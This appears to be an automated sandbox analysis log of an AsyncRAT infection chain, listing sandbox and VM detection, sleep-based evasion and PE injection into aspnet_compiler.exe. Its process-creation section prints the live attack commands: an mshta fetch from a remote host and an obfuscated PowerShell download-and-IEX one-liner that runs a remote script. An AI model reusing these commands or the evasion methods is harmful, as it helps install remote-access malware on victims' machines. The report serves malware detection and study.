                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion:

                  barindex
                  Yara detected AsyncRATShow sources
                  Source: Yara matchFile source: 00000009.00000002.901879167.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.912905645.000000000B2F1000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.913434202.000000000B780000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000003.745955068.0000000005B56000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000002.762757327.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: aspnet_compiler.exe PID: 1296, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 5764, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: aspnet_compiler.exe PID: 3544, type: MEMORY
                  Source: Yara matchFile source: 5.3.powershell.exe.5bcd1ec.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.powershell.exe.b670778.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.powershell.exe.b6827bc.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.3.powershell.exe.5bcd1ec.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.3.powershell.exe.5bbb094.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.powershell.exe.b6827bc.6.unpack, type: UNPACKEDPE
                  Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
                  Source: powershell.exe, 00000005.00000002.912905645.000000000B2F1000.00000004.00000001.sdmp, aspnet_compiler.exe, 00000009.00000002.901879167.0000000000402000.00000040.00000001.sdmp, aspnet_compiler.exe, 0000000A.00000002.762757327.0000000000402000.00000040.00000001.sdmpBinary or memory string: SBIEDLL.DLL
                  Source: C:\Windows\SysWOW64\mshta.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2850Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6118Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4373Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4122Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4103Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4210Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWindow / User API: threadDelayed 1349Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWindow / User API: threadDelayed 8390Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5964Thread sleep time: -9223372036854770s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3840Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2896Thread sleep count: 4103 > 30Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2896Thread sleep count: 4210 > 30Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2860Thread sleep time: -2767011611056431s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2860Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 5836Thread sleep time: -30000s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 5520Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 5520Thread sleep count: 75 > 30Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 5820Thread sleep count: 1349 > 30Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 5820Thread sleep count: 8390 > 30Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 1052Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeFile Volume queried: C:\ FullSizeInformation
                  Source: C:\Windows\SysWOW64\mshta.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Jump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Jump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeFile opened: C:\Users\user\AppData\Jump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeFile opened: C:\Users\user\Jump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior
                  Source: powershell.exe, 00000002.00000002.917575089.000001DEBE700000.00000002.00000001.sdmp, aspnet_compiler.exe, 00000009.00000002.907473311.00000000057E0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
                  Source: mshta.exe, 00000004.00000002.695471290.0000000002CDA000.00000004.00000001.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}'
                  Source: aspnet_compiler.exe, 0000000A.00000002.762757327.0000000000402000.00000040.00000001.sdmpBinary or memory string: vmware
                  Source: mshta.exe, 00000001.00000002.651499116.000002454F73A000.00000004.00000020.sdmp, aspnet_compiler.exe, 00000009.00000003.721978245.000000000515F000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
                  Source: mshta.exe, 00000001.00000002.651380882.000002454F69B000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAWPRnOE
                  Source: aspnet_compiler.exe, 00000009.00000003.721978245.000000000515F000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAWI
                  Source: powershell.exe, 00000002.00000002.917575089.000001DEBE700000.00000002.00000001.sdmp, aspnet_compiler.exe, 00000009.00000002.907473311.00000000057E0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
                  Source: powershell.exe, 00000002.00000002.917575089.000001DEBE700000.00000002.00000001.sdmp, aspnet_compiler.exe, 00000009.00000002.907473311.00000000057E0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
                  Source: mshta.exe, 00000001.00000002.651407334.000002454F6CE000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW?
                  Source: powershell.exe, 00000002.00000002.917430710.000001DEBE29D000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: powershell.exe, 00000002.00000002.917575089.000001DEBE700000.00000002.00000001.sdmp, aspnet_compiler.exe, 00000009.00000002.907473311.00000000057E0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion:

                  barindex
                  Injects a PE file into a foreign processesShow sources
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 value starts with: 4D5AJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 value starts with: 4D5AJump to behavior
                  Writes to foreign memory regionsShow sources
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 402000Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 40E000Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 410000Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 109E008Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 402000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 40E000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 410000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: BDE008Jump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' http://ahmedadel.work/cairo/Encoding.txtJump to behavior
                  Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $c1='(New-Object Net.We'; $c4='bClient).Downlo'; $c3='adString(''http://ahmedadel.work/cairo/ALL.txt'')';$TC=I`E`X ($c1,$c4,$c3 -Join '')|I`E`XJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -windo 1 -noexit -exec bypass -file C:\Users\Public\Microsoft.ps1Jump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -windo 1 -noexit -exec bypass -file 'C:\Users\Public\Microsoft.ps1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe #cmdJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe #cmdJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe #cmdJump to behavior
                  Source: powershell.exe, 00000002.00000002.904283320.000001DEA4720000.00000002.00000001.sdmp, powershell.exe, 00000005.00000002.904230619.00000000037D0000.00000002.00000001.sdmp, powershell.exe, 00000007.00000002.904094323.000002AA65660000.00000002.00000001.sdmp, aspnet_compiler.exe, 00000009.00000002.904174668.00000000015B0000.00000002.00000001.sdmpBinary or memory string: Program Manager
                  Source: powershell.exe, 00000002.00000002.904283320.000001DEA4720000.00000002.00000001.sdmp, powershell.exe, 00000005.00000002.904230619.00000000037D0000.00000002.00000001.sdmp, powershell.exe, 00000007.00000002.904094323.000002AA65660000.00000002.00000001.sdmp, aspnet_compiler.exe, 00000009.00000002.904174668.00000000015B0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
                  Source: powershell.exe, 00000002.00000002.904283320.000001DEA4720000.00000002.00000001.sdmp, powershell.exe, 00000005.00000002.904230619.00000000037D0000.00000002.00000001.sdmp, powershell.exe, 00000007.00000002.904094323.000002AA65660000.00000002.00000001.sdmp, aspnet_compiler.exe, 00000009.00000002.904174668.00000000015B0000.00000002.00000001.sdmpBinary or memory string: Progman
